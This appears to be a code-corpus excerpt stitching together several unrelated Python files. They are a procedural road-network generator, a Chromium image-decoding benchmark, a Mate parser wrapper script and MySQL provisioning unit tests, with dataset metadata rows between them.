mpu.translate_vector(center,[0,0,-0.5])
corners = mpu.dice_edges(corners, dices = 1)
corners.append(center)
position = self.tform.true().position
x,y,z = position
mpu.translate_coords(corners,[x,y,z-rh2])
return corners
def place_vehicles(self, cnt = 2):
rotz1 = rm.randrange(12) * fu.to_rad(30.0)
rotz2 = rm.randrange(12) * fu.to_rad(30.0)
rotz3 = rm.randrange(12) * fu.to_rad(30.0)
trargs1 = {
'position':[0,0,0],
'rotation':[0,0,rotz1],
}
trargs2 = {
'position':[10,10,0],
'rotation':[0,0,rotz2],
}
trargs3 = {
'position':[-10,-10,0],
'rotation':[0,0,rotz3],
}
trk_batch = car_batch(parent = self,
cargs = [trargs1,trargs2,trargs3])
return [trk_batch]
def make_segments(self, *args, **kwargs):
segs = []
#rw = self.road_width
rh = self.road_height
octang = 22.5
clipln = clip_length
octscl = clipln / cos(fu.to_rad(octang))
uo = uoctagon()
uo.scale([octscl,octscl,rh])
rh = 0.25
uo.translate([0,0,-rh-2.0])
#uo.translate_face([0,0,-rh],'top')
segs.append(uo)
return segs
def get_bbox(self):
corners = self.find_corners()
#corners = [[0,0,0],[50,0,0],[50,50,0],[0,50,0]]
#fu.rotate_z_coords(corners,theta)
position = self.tform.true().position
x,y,z = position
mpu.translate_coords(corners,[x,y,z])
bboxes = [mpbb.bbox(corners = corners)]
#bboxes = [fu.bbox(corners = corners)]
return bboxes
class road_segment_primitive(arbitrary_primitive):
roadxml = os.path.join(pr.primitive_data_path, 'road.mesh.xml')
def __init__(self, *args, **kwargs):
proaddata = pr.primitive_data_from_xml(self.roadxml)
arbitrary_primitive.__init__(self, *args, **proaddata)
self.coords_by_face = self.find_faces()
self.tag = '_road_'
self._scale_uvs_ = False
def find_faces(self):
fronts = [v for v in self.coords if v[1] < 0.0]
backs = [v for v in self.coords if v[1] > 0.0]
lefts = [v for v in self.coords if v[0] < 0.0]
rights = [v for v in self.coords if v[0] > 0.0]
bottoms = [v for v in self.coords if v[2] <= 0.0]
tops = [v for v in self.coords if v[2] > 0.0]
facedict = {
'front':fronts,
'back':backs,
'left':lefts,
'right':rights,
'top':tops,
'bottom':bottoms,
}
return facedict
def translate_face(self, vect, face = 'top'):
cfaces = self.coords_by_face
face_coords = cfaces[face]
mpu.translate_coords(face_coords, vect)
self.calculate_normals()
self.modified = True
def rotate_z_face(self, ang_z, face = 'top'):
cfaces = self.coords_by_face
face_coords = cfaces[face]
foff = mpu.center_of_mass(face_coords)
mpu.translate_coords(face_coords, mpu.flip(foff))
mpu.rotate_z_coords(face_coords, ang_z)
mpu.translate_coords(face_coords, foff)
self.calculate_normals()
self.modified = True
class highway_segment_primitive(road_segment_primitive):
roadxml = os.path.join(pr.primitive_data_path, 'highroad.mesh.xml')
class road(node):
road_prim_type = road_segment_primitive
def __init__(self, *args, **kwargs):
kwargs['uv_scales'] = [1,1,1]
self._default_('uv_tform',
self.def_uv_tform(*args,**kwargs),**kwargs)
self._default_('grit_renderingdistance',1000,**kwargs)
self._default_('grit_lod_renderingdistance',2000,**kwargs)
self._default_('consumes_children',True,**kwargs)
self._default_('road_width', 10, **kwargs)
self._default_('road_height', 1, **kwargs)
self.clip_length = clip_length
self.set_segmented_vertices(*args, **kwargs)
self.set_corners(self.segmented_vertices)
segs = self.make_segments(*args, **kwargs)
litter = self.litter(segs)
self.primitives = segs + litter
node.__init__(self, *args, **kwargs)
def pick_seg_count(self, vs):
ds = mpu.distance(vs[0],vs[-1])
seglen = 15
return int(ds/seglen)
def litter(self, segs):
lit = []
return lit
def terrain_points(self):
tpts = []
for corns in self.corners:
tcorns = mpu.translate_coords(corns[:],[0,0,-0.25])
tcorns = mpu.dice_edges(tcorns, dices = 1)
mcorns = [tcorns[3],tcorns[7]]
mpu.translate_coords(mcorns,[0,0,-0.25])
tpts.extend([tc for tc in tcorns if not tc in tpts])
return tpts
def set_corners(self, verts):
corners = []
vcnt = len(verts)
for sgdx in range(1,vcnt):
p1,p2 = verts[sgdx-1],verts[sgdx]
corns = self.make_corners(p1,p2)
corners.append(corns)
self.corners = corners
def make_corners(self, p1, p2):
widt = self.road_width
p1_p2 = mpu.v1_v2(p1,p2)
leng = mpu.magnitude(p1_p2)
p1_p2 = mpu.normalize(p1_p2)
ang_z = fu.angle_from_xaxis(p1_p2)
corns = [[0,-widt/2.0,0],[leng,-widt/2.0,0],
[leng,widt/2.0,0],[0,widt/2.0,0]]
mpu.rotate_z_coords(corns,ang_z)
mpu.translate_coords(corns,p1)
mpu.translate_coords(corns[1:3],[0,0,p2[2]-p1[2]])
return corns
def get_bbox(self):
bboxes = []
for corns in self.corners:
bboxes.append(mpbb.bbox(corners = corns))
#bboxes.append(fu.bbox(corners = corns))
return bboxes
def get_cardinal_normals(self, dirs):
def getcardnorm(dx):
cardx = cardinal_directions.index(dirs[dx])
cardn = cardinal_norms[cardx]
return cardn
norms = [getcardnorm(x) for x in range(2)]
return norms
def info_from_topology(self, *args, **kwargs):
topol = kwargs['topology']
nodes = kwargs['nodes']
st,en = topol[nodes[0]],topol[nodes[1]]
stp = st['inter']['position']
enp = en['inter']['position']
return stp, enp
def set_segmented_vertices(self, *args, **kwargs):
kweys = kwargs.keys()
if 'topology' in kweys:
stp, enp = self.info_from_topology(*args, **kwargs)
else:
stp = kwargs['start']
enp = kwargs['end']
dirs = kwargs['directions']
norms = self.get_cardinal_normals(dirs)
self.stnorm = norms[0]
self.ednorm = mpu.flip(norms[1])
segdice = True
verts = [stp,enp]
verts = self.clip_tips(verts,norms[0],norms[1])
verts = self.add_tips(verts,norms[0],norms[1])
scnt = self.pick_seg_count(verts)
self.segment_count = scnt
def bend(vs):
tips = vs[:2] + vs[-2:]
cox,coy,coz = [list(i) for i in zip(*tips)]
tim = [0.0,1.0,2.0,3.0]
alpha = 1.0/2.0
mpu.parameterize_time(tips,tim,alpha)
cox = mpu.catmull_rom(cox,tim,scnt)
coy = mpu.catmull_rom(coy,tim,scnt)
coz = mpu.catmull_rom(coz,tim,scnt)
new = [list(i) for i in zip(cox,coy,coz)]
return new
if segdice: verts = bend(verts)
self.segmented_vertices = verts
return verts
def add_tips(self,verts,n1,n2):
clip = 25
v1 = verts[0][:]
v2 = verts[1][:]
cl1,cl2 = clip,clip
mpu.translate_vector(v1,mpu.scale_vector(n1[:],[cl1,cl1,cl1]))
mpu.translate_vector(v2,mpu.scale_vector(n2[:],[cl2,cl2,cl2]))
verts.extend([v1, v2])
verts.append(verts.pop(-3))
return verts
def clip_tips(self,verts,n1,n2):
cl = self.clip_length
v1 = mpu.translate_vector(verts[0][:],
mpu.scale_vector(n1[:],[cl,cl,cl]))
v2 = mpu.translate_vector(verts[-1][:],
mpu.scale_vector(n2[:],[cl,cl,cl]))
verts[0] = v1
verts[1] = v2
return verts
def make_segments(self, *args, **kwargs):
verts = self.segmented_vertices
rw = self.road_width
rh = self.road_height
segments = []
vcnt = len(verts)
tangs = [self.stnorm]
angs = []
for sgdx in range(1,vcnt):
p1,p2 = verts[sgdx-1],verts[sgdx]
tangs.append(mpu.normalize(mpu.v1_v2(p1,p2)))
tangs.append(self.ednorm)
for tgdx in range(1,vcnt+1):
t1,t2 = tangs[tgdx-1],tangs[tgdx]
a12 = fu.angle_between_xy(t1,t2)
sign = 0.0 if a12 == 0.0 else a12/abs(a12)
if abs(a12) > np.pi/2:
a12 = 0.0
angs.append(sign * abs(a12))
legs = [True]*vcnt
legs[1::2] = [False]*(int(vcnt/2))
for sgdx in range(1,vcnt):
a1,a2 = angs[sgdx-1],angs[sgdx]
p1,p2 = verts[sgdx-1],verts[sgdx]
strips = self.make_segment(p1,p2,rw,rh,a1,a2,legs[sgdx])
#segments.append(strip)
segments.extend(strips)
return segments
def make_segment(self, p1, p2, widt, depth, a1, a2, leg = False):
leng = mpu.distance_xy(p1,p2)
p1_p2 = mpu.normalize(mpu.v1_v2(p1,p2))
zdiff = p2[2] - p1[2]
ang_z = fu.angle_from_xaxis_xy(p1_p2)
#strip = ucube()
strip = self.road_prim_type()#road_segment_primitive()
#strip = road_segment_primitive()
strip.scale([leng,widt,depth])
strip.scale_uvs([leng/widt,1,1])
strip.translate([leng/2.0,0,-depth])
strip.rotate_z(ang_z)
theta1 = -1.0*a1/2.0
theta2 = a2/2.0
strip.rotate_z_face(theta1, 'left')
strip.translate_face([0,0,zdiff], 'right')
strip.rotate_z_face(theta2, 'right')
strip.translate(p1)
return [strip]
class road_system(node):
def __init__(self, *args, **kwargs):
self._default_('name','road_system',**kwargs)
self._default_('reuse',False,**kwargs)
self._default_('linkmin', 200, **kwargs)
self._default_('linkmax', 400, **kwargs)
self._default_('linkangles',
[90*x for x in range(4)], **kwargs)
self._default_('growth_tips', 5, **kwargs)
self._default_('region_bounds',[(0,1000),(0,1000)],**kwargs)
self._default_('seeds',[[0,0,0],[1000,1000,0]],**kwargs)
self._default_('intersection_count',20,**kwargs)
rwidth = 2*clip_length*tan(fu.to_rad(22.5))
self._default_('road_width', rwidth, **kwargs)
#kwargs['road_width'] = rwidth
children = self.reusing(*args, **kwargs)
if not children:children = self.children_from_kwargs(*args,**kwargs)
self._default_('tform',self.def_tform(*args,**kwargs),**kwargs)
self.add_child(*children)
node.__init__(self, *args, **kwargs)
def children_from_kwargs(self, *args, **kwargs):
rwidth = self.road_width
if 'interargs' in kwargs.keys():
interargs = kwargs['interargs']
children = self.make_system_from_intersections(interargs,rwidth)
else: children = self.make_primitives_web(*args, **kwargs)
return children
# will be class specific
def children_from_reuse_file(self, info_file_name):
info_file_name = os.path.join(os.getcwd(),info_file_name)
self.reuse_data = pk.load_pkl(info_file_name)
#self.reuse_data = {'rargs':[],'iargs':[],'topology':None}
elements = []
self.roads = []
for ig in self.reuse_data['iargs']:
elements.append(intersection(**ig))
for rarg in self.reuse_data['rargs']:
newrd = road(**rarg)
self.roads.append(newrd)
elements.append(newrd)
self.topology = self.reuse_data['topology']
return elements
def output_reuse_file(self, info_file_name):
info_file_name = os.path.join(os.getcwd(),info_file_name)
pk.save_pkl(self.reuse_data, info_file_name)
def reusing(self, *args, **kwargs):
if not self.reuse or not self.name: return
info_file_name = '.'.join([self.name,'reusable','data','pkl'])
if not pk.file_exists(info_file_name):
chds = self.children_from_kwargs(*args, **kwargs)
self.output_reuse_file(info_file_name)
return chds
else:
chds = self.children_from_reuse_file(info_file_name)
return chds
def terrain_points(self):
#pts = [ch.tform.true().position for ch in self.children]
pts = []
[pts.extend(ch.owner.terrain_points())
for ch in self.tform.children]
return pts
def make_primitives_web(self, *args, **kwargs):
def good_dir(tip, ang):
link = rm.choice(range(linkmin,linkmax,50))
#link = rm.randrange(linkmin,linkmax)
tippos = tip['position'][:]
angrad = (np.pi/180.0)*ang
z_off_min = -25
z_off_max = 25
z_offset = rm.randrange(z_off_min, z_off_max)
offset = [link*cos(angrad),link*sin(angrad),z_offset]
newtip = mpu.translate_vector(tippos, offset)
if not mpu.in_region(region_bounds, newtip):
return False,None
for ipos in [i['position'] for i in interargs]:
d = mpu.distance(newtip, ipos)
if d < linkmin: return False,None
return True,newtip
def get_angle(tip):
nodes = [i['position'] for i in interargs]
cmass = [np.mean([s[0] for s in nodes]), np.mean([s[1]
for s in nodes]), np.mean([s[2] for s in nodes])]
#cmass = [0,0,0]
cmass_ang = fu.to_deg(fu.angle_from_xaxis(
mpu.v1_v2(tip['position'],cmass)))
tangs = angs[:]
angdists = [abs(x-cmass_ang) for x in tangs]
closestang = tangs[angdists.index(min(angdists))]
tangs.extend([closestang]*20)
while len(tangs) > 0:
angdx = rm.randrange(len(tangs))
ang = tangs.pop(angdx)
passes,newpos = good_dir(tip, ang)
if passes:
return ang,newpos
return None,None
def place_inter(tip):
ang,newpos = get_angle(tip)
if ang is None: return
return newpos
growth_tips = self.growth_tips
region_bounds = self.region_bounds
linkmin, linkmax = self.linkmin,self.linkmax
seeds = self.seeds
angs = self.linkangles
intercnt = self.intersection_count
seedcnt = len(seeds)
branches = []
for idx in range(seedcnt):
branches.append([{
'position' : seeds[idx],
}])
interargs = [br[0] for br in branches]
sealevelvals = []
for idx in range(intercnt):
tips = [br[-min([len(interargs),growth_tips]):]
for br in branches]
bdx = rm.randrange(seedcnt)
tip = rm.choice(tips[bdx])
newpos = place_inter(tip)
if not newpos is None:
sealevelvals.append(newpos[2])
interargs.append({
'position' : newpos,
})
branches[bdx].append(interargs[-1])
else: print('cant place intersection!!')
#rwidth = kwargs['road_width']
rwidth = self.road_width
self._suggested_sea_level_ = self.pick_sea_level(sealevelvals)
return self.make_system_from_intersections(interargs, rwidth)
def pick_sea_level(self, vals):
maxval = max(vals)
minval = min(vals)
rng = maxval - minval
return minval + rng/10.0
def make_system_from_intersections(self, interargs, rwidth):
elements = []
topology = [{} for inter in interargs]
for inter, topo in zip(interargs, topology):
for card in cardinal_directions:
topo[card] = None
topo['inter'] = inter
topo['roads'] = []
topo['linkcnt'] = 0
self.reuse_data = {'rargs':[],'iargs':[],'topology':None}
self.roads = []
self.highways = []
for tdx, topo in enumerate(topology):
topology[tdx] = find_neighbors(topology,topo,rwidth)
rdbbs = []
hwbbs = []
for tdx, topo in enumerate(topology):
inter = topo['inter']
inter['topology'] = topology
inter['topodex'] = tdx
self.reuse_data['iargs'].append(inter)
elements.append(intersection(**inter))
for rarg in topo['roads']:
self.reuse_data['rargs'].append(rarg)
newrd = road(**rarg)
newbb = newrd.get_bbox()
if not mpbb.intersects(rdbbs,newbb):
rdbbs.extend(newbb)
self.roads.append(newrd)
elements.append(newrd)
else:
newrd = highway(**rarg)
newbb = newrd.get_bbox()
if not mpbb.intersects(hwbbs,newbb):
hwbbs.extend(newbb)
self.highways.append(newrd)
elements.append(newrd)
print('topology mistake from road intersection!')
self.topology = topology
self.reuse_data['topology'] = topology
return elements
def make_primitives_from_blocks(self, *args, **kwargs):
prims = []
# given a list of blocks, determine a set of roads which bounds them
# assume them do not overlap, and that a road should bound each
# determine locations of intersections as all corners of every block
# determine the width, length, and position of each road connecting
# intersections
# also assume that intersections will never intersect by construction
# that is the blocks are sized/positioned to prevent strange
# intersections
# create the kwargs which includes them all
def get_inter_length():
return 40
def get_inter_width():
return 40
blocks = args[0]
used_bcorners = []
corner_signs = [(-1,-1), (0, -1), (0, 0), (-1, 0)]
interargs = []
for bl in blocks:
corn = bl.corners
c1, c2, c3, c4 = corn
for c_, signs in zip(corn, corner_signs):
ilength = get_inter_length()
iwidth = get_inter_width()
ipos = mpu.translate_vector(c_[:],
[signs[0]*ilength,signs[1]*iwidth,0]),
if not ipos in used_bcorners:
used_bcorners.append(ipos)
interargs.append({
'name' : 'intersection_' + str(len(used_bcorners)),
'position' : mpu.translate_vector(
c_[:],[signs[0]*ilength,signs[1]*iwidth,0]),
'length' : ilength,
'width' : iwidth,
'floor_height' : 1.0})
return self.make_system_from_intersections(interargs)
def get_bbox(self):
bboxes = []
roads = self.tform.children
for rdtf in roads:
rdboxes = rdtf.owner.get_bbox()
bboxes.extend(rdboxes)
return bboxes
class highway(road):
road_prim_type = highway_segment_primitive
def terrain_points(self):
tpts = [mpu.translate_vector(l,[0,0,5])
for l in self.leg_positions]
return tpts
def make_segments(self, *args, **kwargs):
self.leg_positions = []
scnt = self.segment_count
sverts = self.segmented_vertices
self.sverts_ground = self.segmented_vertices[:]
#sverts[1][2] += 1
#sverts[-2][2] += 1
tim = [0.0,1.0,2.0,3.0]
alpha = 1.0/2.0
tips = sverts[:2] + sverts[-2:]
#tips = sverts[1:3] + sverts[-3:-1]
coz = [t[2] for t in tips]
mpu.parameterize_time(tips,tim,alpha)
coz = mpu.catmull_rom(coz,tim,scnt)
for sv,co in zip(sverts[1:-1],coz): sv[2] = min(co,sv[2]+20)
rdsegs = road.make_segments(self, *args, **kwargs)
return rdsegs
def make_leg(self, v):
leg = pr.ucube()
leg_leng = 20
leg.scale([5,5,leg_leng])
leg_pos = [v[0],v[1],v[2]-leg_leng-2.0]
leg.translate(leg_pos)
self.leg_positions.append(leg_pos)
return leg
def make_segment(self, p1, p2, widt, depth, a1, a2, leg = False):
depth = 8 # unacceptable...
rs = road.make_segment(self,p1,p2,widt,depth,a1,a2)
[r.translate([0,0,1.75]) for r in rs]# unacceptable...
# use a bbox check to decide to place a leg or not
if not leg: return rs
leg = self.make_leg(p1)
rs.append(leg)
return rs
def pick_closest(pots,ndists):
if pots:
ndx = ndists.index(min(ndists))
return pots[ndx]
return None,None
def select_outlet(outlets,ordered):
for ord_ in ordered:
if ord_ in outlets:
return ord_
def north_check(topology,topo,seek_fov,linkmax):
antidirs = ['west','southwest','south','southeast','east']
tpos = topo['inter']['position']
potentials = []
ndists = []
tthresh = 50
max_slope = 0.5
for pntopo in topology:
outlets = [ake for ake in antidirs if pntopo[ake] is None]
if outlets:
pnpos = pntopo['inter']['position']
if tpos[1] < pnpos[1]:
ndist = float(pnpos[1] - tpos[1])
zdiff = abs(tpos[2] - pnpos[2])
slope = zdiff/abs(ndist)
if slope > max_slope: continue
if ndist < linkmax:
tdist = float(pnpos[0] - tpos[0])
pn_fov_theta = fu.to_deg(np.arctan(abs(tdist)/ndist))
if pn_fov_theta < seek_fov/2.0:
if abs(tdist) <= tthresh:
order = ['south','southeast','southwest']
elif tdist < -tthresh:
order = ['southeast','south','east']
elif tdist > tthresh:
order = ['southwest','south','west']
dir_ = select_outlet(outlets,order)
if not dir_ is None:
potentials.append((pntopo,dir_))
ndists.append(ndist)
return pick_closest(potentials,ndists)
def south_check(topology,topo,seek_fov,linkmax):
antidirs = ['west','northwest','north','northeast','east']
tpos = topo['inter']['position']
potentials = []
ndists = []
tthresh = 50
max_slope = 0.5
for pntopo in topology:
outlets = [ake for ake in antidirs if pntopo[ake] is None]
if outlets:
pnpos = pntopo['inter']['position']
if tpos[1] > pnpos[1]:
ndist = -1*float(pnpos[1] - tpos[1])
zdiff = abs(tpos[2] - pnpos[2])
slope = zdiff/abs(ndist)
if slope > max_slope: continue
if ndist < linkmax:
tdist = float(pnpos[0] - tpos[0])
pn_fov_theta = fu.to_deg(np.arctan(abs(tdist)/ndist))
if pn_fov_theta < seek_fov/2.0:
if abs(tdist) <= tthresh:
order = ['north','northeast','northwest']
elif tdist < -tthresh:
order = ['northeast','north','east']
elif tdist > tthresh:
order = ['northwest','north','west']
dir_ = select_outlet(outlets,order)
if not dir_ is None:
potentials.append((pntopo,dir_))
ndists.append(ndist)
return pick_closest(potentials,ndists)
def east_check(topology,topo,seek_fov,linkmax):
antidirs = ['north','northwest','west','southwest','south']
tpos = topo['inter']['position']
potentials = []
ndists = []
normdx = 0
trandx = 1
tthresh = 50
max_slope = 0.5
for pntopo in topology:
outlets = [ake for ake in antidirs if pntopo[ake] is None]
if outlets:
pnpos = pntopo['inter']['position']
if tpos[normdx] < pnpos[normdx]:
ndist = float(pnpos[normdx] - tpos[normdx])
zdiff = abs(tpos[2] - pnpos[2])
slope = zdiff/abs(ndist)
if slope > max_slope: continue
if ndist < linkmax:
tdist = float(pnpos[trandx] - tpos[trandx])
pn_fov_theta = fu.to_deg(np.arctan(abs(tdist)/ndist))
if pn_fov_theta < seek_fov/2.0:
if abs(tdist) <= tthresh:
order = ['west','southwest','northwest']
elif tdist < -tthresh:
order = ['northwest','west','north']
elif tdist > tthresh:
order = ['southwest','west','south']
dir_ = select_outlet(outlets,order)
if not dir_ is None:
potentials.append((pntopo,dir_))
ndists.append(ndist)
return pick_closest(potentials,ndists)
def west_check(topology,topo,seek_fov,linkmax):
antidirs = ['north','northeast','east','southeast','south']
tpos = topo['inter']['position']
potentials = []
ndists = []
normdx = 0
trandx = 1
tthresh = 50
max_slope = 0.5
for pntopo in topology:
outlets = [ake for ake in antidirs if pntopo[ake] is None]
if outlets:
pnpos = pntopo['inter']['position']
if tpos[normdx] > pnpos[normdx]:
ndist = -1*float(pnpos[normdx] - tpos[normdx])
zdiff = abs(tpos[2] - pnpos[2])
slope = zdiff/abs(ndist)
if slope > max_slope: continue
if ndist < linkmax:
tdist = float(pnpos[trandx] - tpos[trandx])
pn_fov_theta = fu.to_deg(np.arctan(abs(tdist)/ndist))
if pn_fov_theta < seek_fov/2.0:
if abs(tdist) <= tthresh:
order = ['east','southeast','northeast']
elif tdist < -tthresh:
order = ['northeast','east','north']
elif tdist > tthresh:
order = ['southeast','east','south']
dir_ = select_outlet(outlets,order)
if not dir_ is None:
potentials.append((pntopo,dir_))
ndists.append(ndist)
return pick_closest(potentials,ndists)
neighbor_checks = {
'north' : north_check,
'east' : east_check,
'south' : south_check,
'west' : west_check,
}
def find_neighbors(topology,topo,rwidth):
topoid = [t is topo for t in topology].index(True)
seek_fov = 60
maxlinks = 4
linkmax = 1000
for card in cardinal_directions:
if topo['linkcnt'] >= maxlinks: return topo
if not card in neighbor_checks.keys(): continue
neighb,neighbdir = neighbor_checks[card](
topology,topo,seek_fov,linkmax)
if not neighb is None:
topodx = [n is neighb for n in topology].index(True)
if neighb['linkcnt'] >= maxlinks: continue
if topodx in topo.values(): continue
topo[card] = topodx
topo['linkcnt'] += 1
neighb[neighbdir] = topoid
neighb['linkcnt'] += 1
topo['roads'].append({
'road_width' : rwidth,
'topology' : topology,
'directions' : (card,neighbdir),
'nodes' : (topoid,topodx)})
return topo
def no_road_intersects(topology,idx1,idx2):
topo1 = topology[idx1]
topo2 = topology[idx2]
s1 = (topo1['inter']['position'],
topo2['inter']['position'],)
cardinals = ['north', 'south', 'east', 'west']
for x in topology:
links = [x[key] for key in cardinals if not x[key] is None]
for ldx in links:
y = topology[ldx]
s2 = (x['inter']['position'],
y['inter']['position'],)
if mpu.segments_intersect(s1,s2): return False
return True
|
gpl-2.0
| -6,110,025,529,739,502,000
| 36.849315
| 77
| 0.533991
| false
| 3.385684
| false
| false
| false
|
loopCM/chromium
|
tools/perf/perf_tools/image_decoding_measurement.py
|
1
|
1268
|
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from telemetry.page import page_measurement
class ImageDecoding(page_measurement.PageMeasurement):
def WillNavigateToPage(self, page, tab):
tab.StartTimelineRecording()
def MeasurePage(self, page, tab, results):
tab.StopTimelineRecording()
def _IsDone():
return tab.EvaluateJavaScript('isDone')
decode_image_events = \
tab.timeline_model.GetAllOfName('DecodeImage')
# If it is a real image page, then store only the last-minIterations
# decode tasks.
if (hasattr(page,
'image_decoding_measurement_limit_results_to_min_iterations') and
page.image_decoding_measurement_limit_results_to_min_iterations):
assert _IsDone()
min_iterations = tab.EvaluateJavaScript('minIterations')
decode_image_events = decode_image_events[-min_iterations:]
durations = [d.duration for d in decode_image_events]
if not durations:
results.Add('ImageDecoding_avg', 'ms', 'unsupported')
return
image_decoding_avg = sum(durations) / len(durations)
results.Add('ImageDecoding_avg', 'ms', image_decoding_avg)
|
bsd-3-clause
| 44,070,709,298,462,310
| 36.294118
| 80
| 0.708991
| false
| 3.865854
| false
| false
| false
|
kimgerdes/arborator
|
lib/parser.py
|
1
|
3443
|
# -*- coding: utf-8 -*-
#!/usr/bin/python
import argparse, datetime, glob, os
from mate import parsing, createNonExistingFolders
from retokenisation import retokeniser
from conll import makeEmpty
memory="40G"
def parseFile(infile, lemodel, tagmodel, parsemodel, folderpref="mate/parses/"):
timestamp=datetime.datetime.now().strftime('%Y-%m-%d_%H:%M')
if folderpref: prelimfolder=folderpref+"_prelim/"
else: prelimfolder=folderpref+timestamp+"_prelim/"
parsefile = parsing(infile=infile, lemodel=lemodel, tagmodel=tagmodel,parsemodel=parsemodel , outfolder=prelimfolder, memory=memory) # , depparse=False
#parsefile="mate/parses/2016-09-22_01:18/Louise_Liotard_F_85_et_Jeanne_Mallet_F_75_SO-2-one-word-per-line.conll14_parse"
print "retokenizing..."
newname=retokeniser(parsefile, addtoout="_retok")
print "retokenization done"
if folderpref: outfolder=folderpref+"/"
else: outfolder=folderpref+timestamp+"/"
createNonExistingFolders(outfolder)
emptyname=makeEmpty(newname, outfolder=outfolder)
parsefile = parsing(infile=emptyname, lemodel=modeldir+args.get("lemmodel",None), tagmodel=modeldir+args.get("tagmodel",None), parsemodel=modeldir+args.get("parsemodel",None), outfolder=outfolder, memory="40G")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='wrapper for mate parser with orfeo dictionaries')
parser.add_argument('-ci','--conllinfile', help='file to be parsed', type=lambda s: unicode(s, 'utf8'), required=False)
parser.add_argument('-cf','--conllfilter', help='files to be parsed', type=lambda s: unicode(s, 'utf8'), required=False)
parser.add_argument('-md','--modeldir', help='folder containing the models', type=lambda s: unicode(s, 'utf8'), required=True)
parser.add_argument('-lm','--lemmodel', help='lemmatizing model', type=lambda s: unicode(s, 'utf8'), required=False, nargs='?', default="LemModel")
parser.add_argument('-tm','--tagmodel', help='tagging model', type=lambda s: unicode(s, 'utf8'), required=False, nargs='?', default="TagModel")
parser.add_argument('-pm','--parsemodel', help='parsing model', type=lambda s: unicode(s, 'utf8'), required=False, nargs='?', default="ParseModel")
args = vars(parser.parse_args())
modeldir=args.get("modeldir",".")
infile=args.get("conllinfile",None)
conllfilter=args.get("conllfilter",None)
lemodel=modeldir+args.get("lemmodel",None)
tagmodel=modeldir+args.get("tagmodel",None)
parsemodel=modeldir+args.get("parsemodel",None)
if infile:
parseFile(infile, lemodel, tagmodel, parsemodel)
elif conllfilter:
timestamp=datetime.datetime.now().strftime('%Y-%m-%d_%H:%M')
for infile in glob.glob(conllfilter):
head, tail = os.path.split(infile) # put the parse output next to the infile
parseFile(infile, lemodel, tagmodel, parsemodel, folderpref=head+"/"+timestamp)
# python parser.py -ci mate/AParser/echantillon/Louise_Liotard_F_85_et_Jeanne_Mallet_F_75_SO-2-one-word-per-line.conll14 -lm mate/AParser/LemModel -tm mate/AParser/TagModel -pm mate/AParser/ParseModel
# python parser.py -ci mate/AParser/echantillon/Louise_Liotard_F_85_et_Jeanne_Mallet_F_75_SO-2-one-word-per-line.conll14 -md mate/AParser/
# python parser.py -ci mate/AParser/echantillon/Louise_Liotard_F_85_et_Jeanne_Mallet_F_75_SO-2-one-word-per-line.conll14 -md mate/AParser/
# python parser.py -cf "mate/AParser/echantillon/*.conll14" -md mate/AParser/
# python parser.py -cf "mate/AParser/tcof/*.conll14" -md mate/AParser/
|
agpl-3.0
| -919,325,971,577,784,000
| 56.4
| 211
| 0.743247
| false
| 2.854892
| false
| false
| false
|
python-provy/provy
|
tests/unit/more/centos/database/test_mysql.py
|
1
|
11786
|
from mock import call, patch
from nose.tools import istest
from .fixtures import (
FOO_DB_WITH_JOHN_GRANTS,
FOO_DB_WITHOUT_JOHN_GRANTS,
FOO_DB_WITH_JOHN_GRANTS_AND_GRANT_OPTION,
HOSTS_FOR_USER,
DATABASES,
)
from provy.more.centos import YumRole, MySQLRole
from tests.unit.tools.helpers import ProvyTestCase
class MySQLRoleTest(ProvyTestCase):
def setUp(self):
super(MySQLRoleTest, self).setUp()
self.role = MySQLRole(prov=None, context={})
@istest
def has_no_grant_if_not_granted(self):
with self.execute_mock() as execute:
execute.return_value = FOO_DB_WITHOUT_JOHN_GRANTS
self.assertFalse(self.role.has_grant('ALL', 'foo', 'john', '%', False))
execute.assert_called_with('''mysql -u root -E -e "SHOW GRANTS FOR 'john'@'%';" mysql''', sudo=True, stdout=False)
@istest
def has_grant_if_granted(self):
with self.execute_mock() as execute:
execute.return_value = FOO_DB_WITH_JOHN_GRANTS
self.assertTrue(self.role.has_grant('ALL', 'foo', 'john', '%', False))
execute.assert_called_with('''mysql -u root -E -e "SHOW GRANTS FOR 'john'@'%';" mysql''', sudo=True, stdout=False)
@istest
def has_grant_if_granted_with_grant_option(self):
with self.execute_mock() as execute:
execute.return_value = FOO_DB_WITH_JOHN_GRANTS_AND_GRANT_OPTION
self.assertTrue(self.role.has_grant('ALL', 'foo', 'john', '%', True))
execute.assert_called_with('''mysql -u root -E -e "SHOW GRANTS FOR 'john'@'%';" mysql''', sudo=True, stdout=False)
@istest
def has_grant_if_granted_even_if_provided_full(self):
with self.execute_mock() as execute:
execute.return_value = FOO_DB_WITH_JOHN_GRANTS
self.assertTrue(self.role.has_grant('ALL PRIVILEGES', 'foo', 'john', '%', False))
execute.assert_called_with('''mysql -u root -E -e "SHOW GRANTS FOR 'john'@'%';" mysql''', sudo=True, stdout=False)
@istest
def has_grant_if_granted_even_if_provided_as_lowercase_string(self):
with self.execute_mock() as execute:
execute.return_value = FOO_DB_WITH_JOHN_GRANTS
self.assertTrue(self.role.has_grant('all', 'foo', 'john', '%', False))
execute.assert_called_with('''mysql -u root -E -e "SHOW GRANTS FOR 'john'@'%';" mysql''', sudo=True, stdout=False)
@istest
def can_get_user_grants(self):
with self.execute_mock() as execute:
execute.return_value = FOO_DB_WITHOUT_JOHN_GRANTS
expected = ["GRANT USAGE ON *.* TO 'john'@'%' IDENTIFIED BY PASSWORD '*B9EE00DF55E7C816911C6DA56F1E3A37BDB31093'"]
self.assertEqual(expected, self.role.get_user_grants('john', '%'))
execute.assert_called_with('''mysql -u root -E -e "SHOW GRANTS FOR 'john'@'%';" mysql''', sudo=True, stdout=False)
@istest
def installs_necessary_packages_to_provision(self):
with self.using_stub(YumRole) as mock_yum, self.execute_mock() as execute:
mock_yum.ensure_package_installed.return_value = 'some result'
self.role.provision()
self.assertEqual(execute.mock_calls, [
call("mysqladmin -u %s -p'temppass' password '%s'" % (self.role.mysql_root_user, self.role.mysql_root_pass),
stdout=False, sudo=True),
])
self.assertEqual(mock_yum.ensure_package_installed.mock_calls, [
call('mysql-server'),
call('mysql-devel'),
call('mysql-libs'),
])
@istest
def installs_necessary_packages_to_provision_again(self):
with self.using_stub(YumRole) as mock_yum, self.execute_mock() as execute:
mock_yum.ensure_package_installed.return_value = False
self.role.provision()
self.assertFalse(execute.called)
